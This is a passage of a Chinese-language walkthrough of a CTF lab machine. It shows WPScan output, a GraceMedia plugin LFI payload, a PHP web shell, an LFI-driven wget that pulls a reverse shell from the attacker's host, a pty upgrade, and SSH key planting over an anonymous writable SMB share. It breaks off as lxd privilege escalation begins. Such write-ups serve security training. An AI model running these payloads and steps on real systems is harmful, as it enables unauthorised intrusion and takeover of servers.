 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21663
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jmmq-m8p8-332h
 |      - https://hackerone.com/reports/541469
 |
 | [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery
 |     Fixed in: 5.8.4
 |     References:
 |      - https://wpscan.com/vulnerability/1ac912c1-5e29-41ac-8f76-a062de254c09
 |      - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
 |
 | [!] Title: WordPress < 5.9.2 / Gutenberg < 12.7.2 - Prototype Pollution via Gutenberg’s wordpress/url package
 |     Fixed in: 5.8.4
 |     References:
 |      - https://wpscan.com/vulnerability/6e61b246-5af1-4a4f-9ca8-a8c87eb2e499
 |      - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
 |      - https://github.com/WordPress/gutenberg/pull/39365/files
 |
 | [!] Title: WP < 6.0.2 - Reflected Cross-Site Scripting
 |     Fixed in: 5.8.5
 |     References:
 |      - https://wpscan.com/vulnerability/622893b0-c2c4-4ee7-9fa1-4cecef6e36be
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
 |
 | [!] Title: WP < 6.0.2 - Authenticated Stored Cross-Site Scripting
 |     Fixed in: 5.8.5
 |     References:
 |      - https://wpscan.com/vulnerability/3b1573d4-06b4-442b-bad5-872753118ee0
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
 |
 | [!] Title: WP < 6.0.2 - SQLi via Link API
 |     Fixed in: 5.8.5
 |     References:
 |      - https://wpscan.com/vulnerability/601b0bf9-fed2-4675-aec7-fed3156a022f
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
 |
 | [!] Title: WP < 6.0.3 - Stored XSS via wp-mail.php
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/713bdc8b-ab7c-46d7-9847-305344a579c4
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/abf236fdaf94455e7bc6e30980cf70401003e283
 |
 | [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/926cd097-b36f-4d26-9c51-0dfab11c301b
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/506eee125953deb658307bb3005417cb83f32095
 |
 | [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/c5675b59-4b1d-4f64-9876-068e05145431
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44
 |
 | [!] Title: WP < 6.0.3 - Reflected XSS via SQLi in Media Library
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/cfd8b50d-16aa-4319-9c2d-b227365c2156
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/8836d4682264e8030067e07f2f953a0f66cb76cc
 |
 | [!] Title: WP < 6.0.3 - CSRF in wp-trackback.php
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/b60a6557-ae78-465c-95bc-a78cf74a6dd0
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/a4f9ca17fae0b7d97ff807a3c234cf219810fae0
 |
 | [!] Title: WP < 6.0.3 - Stored XSS via the Customizer
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/2787684c-aaef-4171-95b4-ee5048c74218
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef
 |
 | [!] Title: WP < 6.0.3 - Stored XSS via Comment Editing
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/02d76d8e-9558-41a5-bdb6-3957dc31563b
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/89c8f7919460c31c0f259453b4ffb63fde9fa955
 |
 | [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/3f707e05-25f0-4566-88ed-d8d0aff3a872
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/3765886b4903b319764490d4ad5905bc5c310ef8
 |
 | [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/1da03338-557f-4cb6-9a65-3379df4cce47
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/d815d2e8b2a7c2be6694b49276ba3eee5166c21f
 |
 | [!] Title: WP < 6.0.3 - Stored XSS via RSS Widget
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/58d131f5-f376-4679-b604-2b888de71c5b
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/929cf3cb9580636f1ae3fe944b8faf8cca420492
 |
 | [!] Title: WP < 6.0.3 - Data Exposure via REST Terms/Tags Endpoint
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/b27a8711-a0c0-4996-bd6a-01734702913e
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/ebaac57a9ac0174485c65de3d32ea56de2330d8e
 |
 | [!] Title: WP < 6.0.3 - Multiple Stored XSS via Gutenberg
 |     Fixed in: 5.8.6
 |     References:
 |      - https://wpscan.com/vulnerability/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
 |      - https://github.com/WordPress/gutenberg/pull/45045/files
 |
 | [!] Title: WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding
 |     References:
 |      - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3590
 |      - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/
 |
 | [!] Title: WP < 6.2.1 - Directory Traversal via Translation Files
 |     Fixed in: 5.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/2999613a-b8c8-4ec0-9164-5dfe63adf6e6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2745
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |
 | [!] Title: WP < 6.2.1 - Thumbnail Image Update via CSRF
 |     Fixed in: 5.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/a03d744a-9839-4167-a356-3e7da0f1d532
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |
 | [!] Title: WP < 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery
 |     Fixed in: 5.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/3b574451-2852-4789-bc19-d5cc39948db5
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |
 | [!] Title: WP < 6.2.2 - Shortcode Execution in User Generated Data
 |     Fixed in: 5.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/ef289d46-ea83-4fa5-b003-0352c690fd89
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-2-security-release/
 |
 | [!] Title: WP < 6.2.1 - Contributor+ Content Injection
 |     Fixed in: 5.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/1527ebdb-18bc-4f9d-9c20-8d729a628670
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
 |
 | [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests
 |     Fixed in: 5.8.8
 |     References:
 |      - https://wpscan.com/vulnerability/da1419cc-d821-42d6-b648-bdb3c70d91f2
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning
 |     Fixed in: 5.8.8
 |     References:
 |      - https://wpscan.com/vulnerability/6d80e09d-34d5-4fda-81cb-e703d0e56e4f
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution
 |     Fixed in: 5.8.8
 |     References:
 |      - https://wpscan.com/vulnerability/3615aea0-90aa-4f9a-9792-078a90af7f59
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure
 |     Fixed in: 5.8.8
 |     References:
 |      - https://wpscan.com/vulnerability/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39999
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure
 |     Fixed in: 5.8.8
 |     References:
 |      - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5561
 |      - https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data
 |     Fixed in: 5.8.9
 |     References:
 |      - https://wpscan.com/vulnerability/5e9804e5-bbd4-4836-a5f0-b4388cc39225
 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
 |
 | [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload
 |     Fixed in: 5.8.9
 |     References:
 |      - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a
 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/

[+] WordPress theme in use: twentytwentyone
 | Location: http://192.168.6.163/wp/wp-content/themes/twentytwentyone/
 | Last Updated: 2024-04-02T00:00:00.000Z
 | Readme: http://192.168.6.163/wp/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://192.168.6.163/wp/wp-content/themes/twentytwentyone/style.css?ver=1.3
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.6.163/wp/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] gracemedia-media-player
 | Location: http://192.168.6.163/wp/wp-content/plugins/gracemedia-media-player/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2013-07-21T15:09:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
 |      - https://www.exploit-db.com/exploits/46537/
 |      - https://seclists.org/fulldisclosure/2019/Mar/26
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.6.163/wp/wp-content/plugins/gracemedia-media-player/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.6.163/wp/wp-content/plugins/gracemedia-media-player/readme.txt

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:02 <======================> (652 / 652) 100.00% Time: 00:00:02
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:08 <====================> (2575 / 2575) 100.00% Time: 00:00:08

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=======================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <=============================> (75 / 75) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:01 <==================> (100 / 100) 100.00% Time: 00:00:01

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <========================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 4
 | Requests Remaining: 21

[+] Finished: Fri Jun  7 07:44:14 2024
[+] Requests Done: 3604
[+] Cached Requests: 10
[+] Data Sent: 1022.281 KB
[+] Data Received: 1.019 MB
[+] Memory used: 265.598 MB
[+] Elapsed time: 00:00:39

发现本地文件包含漏洞(LFI)

更多信息:

序号URL
1https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
2https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
3https://www.exploit-db.com/exploits/46537/
4https://seclists.org/fulldisclosure/2019/Mar/26

如何利用:

2.5.3 漏洞验证

测试连接为:
http://192.168.6.163/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=…/…/…/…/…/…/…/…/…/…/etc/passwd
LFI执行

验证了,存在LFI漏洞。


三、渗透测试

3.1 10123端口

3.1.1 浏览器访问10123端口

测试链接为:http://192.168.6.163:10123/
10123端口
我们发现这是一个home目录

3.1.2 终端访问10123端口

3.1.2.1 bash_history
┌──(root㉿kali)-[/home/kali]
└─# curl http://192.168.6.163:10123/.bash_history
sudo su -
ifconfig
ls
cd upload/
ls
ls -l
cd ..
ls -l
chmod 755 jarves/

发现用户:
jarves

3.1.2.2 something
┌──(root㉿kali)-[/home/kali]
└─# curl http://192.168.6.163:10123/something
I wanted to make it my home directory. But idea must be changed.


Thanks,
jarves
               

无有用信息

3.1.2.3 upload目录
┌──(root㉿kali)-[/home/kali]
└─# curl http://192.168.6.163:10123/upload/shell.php
<?php echo system($_GET['cmd']);?>

发现upload目录下的shell.php可执行系统命令。

3.2 反弹shell

3.2.1 kali监听端口

└─# nc -lvp 4567                           
listening on [any] 4567 ...

bash终端已经显示,监听端口4567

3.2.2 生成反弹shell

  • 利用在线工具生成反弹shell脚本文件
  • 参数设置如下:反弹shell.php
  • 点击复制Copy
  • vim shell.php
  • 粘贴复制的内容

3.2.3 上传shell.php

3.2.3.1 开启http服务
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/prime2]
└─# python -m http.server 8000 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

显示当前目录已经开启http服务。

3.2.3.2 利用漏洞上传shell.php
  • 在浏览器输入以下地址,按回车键:
http://192.168.6.163/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=wget http://192.168.6.66:8000/shell.php -O /tmp/shell.php
3.2.3.3 查看shell.php
  • 在浏览器输入以下地址,按回车键查看上传的shell.php:
http://192.168.6.163/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=cat /tmp/shell.php
3.2.3.4 访问shell.php
  • 在浏览器输入以下地址,按回车键查看上传的shell.php:
http://192.168.6.163/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../tmp/shell.php

获得反弹shell

成功获得反弹shell

3.3 shell升级

  • 调用标准终端
python3 -c 'import pty;pty.spawn("/bin/bash")';

调用标准终端

调用标准终端成功。

3.4 系统提权

3.4.1 查看smb服务配置

┌──(root㉿kali)-[/]
└─# cat /etc/samba/smb.conf
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
# Forked by Kali.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which 
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
#  - When such options are commented with ";", the proposed setting
#    differs from the default Samba behaviour
#  - When commented with "#", the proposed setting is the default
#    behaviour of Samba but the option is considered important
#    enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic 
# errors. 

#======================= Global Settings =======================

[global]

#### Kali configuration (use kali-tweaks to change it) ####

# By default a Kali system should be configured for wide compatibility,
# to easily interact with servers using old vulnerable protocols.
   client min protocol = LANMAN1

## Browsing/Identification ###

# Change this to the workgroup/NT-domain name your Samba server will part of
   workgroup = WORKGROUP

#### Networking ####

# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
;   interfaces = 127.0.0.0/8 eth0

# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself.  However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
;   bind interfaces only = yes



#### Debugging/Accounting ####

# This tells Samba to use a separate log file for each machine
# that connects
   log file = /var/log/samba/log.%m

# Cap the size of the individual log files (in KiB).
   max log size = 1000

# We want Samba to only log to /var/log/samba/log.{smbd,nmbd}.
# Append syslog@1 if you want important messages to be sent to syslog too.
   logging = file

# Do something sensible when Samba crashes: mail the admin a backtrace
   panic action = /usr/share/samba/panic-action %d


####### Authentication #######

# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller". 
#
# Most people will want "standalone server" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
   server role = standalone server

   obey pam restrictions = yes

# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
   unix password sync = yes

# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
   passwd program = /usr/bin/passwd %u
   passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .

# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
   pam password change = yes

# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
   map to guest = bad user

########## Domains ###########

#
# The following settings only takes effect if 'server role = classic
# primary domain controller', 'server role = classic backup domain controller'
# or 'domain logons' is set 
#

# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
;   logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
#   logon path = \\%N\%U\profile

# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
;   logon drive = H:
#   logon home = \\%N\%U

# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
;   logon script = logon.cmd

# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe.  The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u

# This allows machine accounts to be created on the domain controller via the 
# SAMR RPC pipe.  
# The following assumes a "machines" group exists on the system
; add machine script  = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u

# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.  
; add group script = /usr/sbin/addgroup --force-badname %g

############ Misc ############

# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
;   include = /home/samba/etc/smb.conf.%m

# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
;   idmap config * :              backend = tdb
;   idmap config * :              range   = 3000-7999
;   idmap config YOURDOMAINHERE : backend = tdb
;   idmap config YOURDOMAINHERE : range   = 100000-999999
;   template shell = /bin/bash

# Setup usershare options to enable non-root users to share folders
# with the net usershare command.

# Maximum number of usershare. 0 means that usershare is disabled.
#   usershare max shares = 100

# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
   usershare allow guests = yes

#======================= Share Definitions =======================

[homes]
   comment = Home Directories
   browseable = no

# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
   read only = yes

# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
   create mask = 0700

# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
   directory mask = 0700

# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# The following parameter makes sure that only "username" can connect
# to \\server\username
# This might need tweaking when using external authentication schemes
   valid users = %S

# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
;   comment = Network Logon Service
;   path = /home/samba/netlogon
;   guest ok = yes
;   read only = yes

# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
;   comment = Users profiles
;   path = /home/samba/profiles
;   guest ok = no
;   browseable = no
;   create mask = 0600
;   directory mask = 0700

[printers]
   comment = All Printers
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no
   read only = yes
   create mask = 0700

# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it

  • 关键信息如下:

# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
   usershare allow guests = yes

允许guests访客匿名访问。

3.4.2 查看共享目录

──(root㉿kali)-[/]
└─# smbclient -N -L \\\\192.168.6.163


	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	welcome         Disk      Welcome to Hackerctf LAB
	IPC$            IPC       IPC Service (hackerctflab server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

有一个welcome目录

3.4.3 welcome目录

3.4.3.1 列举目录
┌──(root㉿kali)-[/]
└─# smbclient -N \\\\192.168.6.163\\welcome
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat May  8 03:42:49 2021
  ..                                  D        0  Fri May  7 14:38:58 2021
  .mysql_history                      H       18  Sat May  8 03:05:03 2021
  .profile                            H      807  Fri Mar 19 12:02:58 2021
  upload                              D        0  Sun May  9 07:19:02 2021
  .sudo_as_admin_successful           H        0  Sat May  8 01:34:48 2021
  .bash_logout                        H      220  Fri Mar 19 12:02:58 2021
  .cache                             DH        0  Fri May  7 14:39:15 2021
  something                           N       82  Fri May  7 12:18:09 2021
  secrets                             N        0  Fri May  7 12:15:17 2021
  .bash_history                       H       72  Sun May  9 07:23:26 2021
  .bashrc                             H     3771  Fri Mar 19 12:02:58 2021

		19475088 blocks of size 1024. 9518848 blocks available

3.4.3.2 靶机创建.ssh文件夹
smb: \> mkdir .ssh
smb: \> ls
  .                                   D        0  Fri Jun  7 09:35:27 2024
  ..                                  D        0  Fri May  7 14:38:58 2021
  .mysql_history                      H       18  Sat May  8 03:05:03 2021
  .ssh                               DH        0  Fri Jun  7 09:35:27 2024
  .profile                            H      807  Fri Mar 19 12:02:58 2021
  upload                              D        0  Sun May  9 07:19:02 2021
  .sudo_as_admin_successful           H        0  Sat May  8 01:34:48 2021
  .bash_logout                        H      220  Fri Mar 19 12:02:58 2021
  .cache                             DH        0  Fri May  7 14:39:15 2021
  something                           N       82  Fri May  7 12:18:09 2021
  secrets                             N        0  Fri May  7 12:15:17 2021
  .bash_history                       H       72  Sun May  9 07:23:26 2021
  .bashrc                             H     3771  Fri Mar 19 12:02:58 2021

		19475088 blocks of size 1024. 9518828 blocks available

3.4.3.3 kali生成秘钥
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/prime2]
└─# ssh-keygen -f /home/kali/dev_run_app/vulhub/prime2/test
Generating public/private ed25519 key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/dev_run_app/vulhub/prime2/test
Your public key has been saved in /home/kali/dev_run_app/vulhub/prime2/test.pub
The key fingerprint is:
SHA256:ERiVUFdIHUkkmsO5QtODytxb9vl41ddj6FRgrR1rZNY root@kali
The key's randomart image is:
+--[ED25519 256]--+
|      o*+o+*=o. .|
|      .+.*..oo *E|
|      + X   . B o|
|   o + . =   . = |
|    + o S     +..|
|       = . . o.o+|
|      .   o o.. o|
|           o..   |
|          ...    |
+----[SHA256]-----+
                                                                                                                                                                                  
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/prime2]
└─# ls
shell.php  test  test.pub

                                                            
3.4.3.4 重命名秘钥

依次执行以下命令完成秘钥重命名。

                                                                                                       
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/prime2]
└─# mv test.pub authorized_keys                       
                                                                                                      
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/prime2]
└─# ls
authorized_keys  shell.php  test
                                                      

已经生成秘钥authorized_keys

3.4.3.5 上传秘钥
smb: \> put /home/kali/dev_run_app/vulhub/prime2/authorized_keys .ssh/authorized_keys
putting file /home/kali/dev_run_app/vulhub/prime2/authorized_keys as \.ssh\authorized_keys (11.1 kb/s)
smb: \> cd .ssh
smb: \.ssh\> ls
  .                                   D        0  Fri Jun  7 09:46:11 2024
  ..                                  D        0  Fri Jun  7 09:35:27 2024
  authorized_keys                     A       91  Fri Jun  7 09:46:11 2024

		19475088 blocks of size 1024. 9518784 blocks available

显示上传秘钥成功。

3.3.4 ssh连接

3.3.4.1 登录ssh远程连接
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/prime2]
└─# ssh jarves@192.168.6.163 -i test                       
The authenticity of host '192.168.6.163 (192.168.6.163)' can't be established.
ED25519 key fingerprint is SHA256:nB+xRANNsBufP64KnDjxamkvfGVw1eJUiz/kCMnJ9wU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.6.163' (ED25519) to the list of known hosts.
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jun  7 01:52:47 PM UTC 2024

  System load: 0.36               Memory usage: 26%   Processes:       241
  Usage of /:  46.0% of 18.57GB   Swap usage:   0%    Users logged in: 0

  => There were exceptions while processing one or more plugins. See
     /var/log/landscape/sysinfo.log for more information.

 * Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!

     https://microk8s.io/

9 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun May  9 11:14:10 2021
jarves@hackerctflab:~$ 

成功无密码登录jarvers用户的远程连接。

3.3.4.2 查看用户信息
jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

3.3.4.3 查看用户信息
jarves@hackerctflab:~$ which lxc
/snap/bin/lxc

发现是 lxd 组的

3.3.5 提权

3.3.5.1 系统更新
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/prime2]
└─# sudo apt update                       
Get:1 http://kali.download/kali kali-rolling InRelease [41.5 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 Packages [19.9 MB]
Get:3 http://kali.download/kali kali-rolling/main amd64 Contents (deb) [47.0 MB]                     
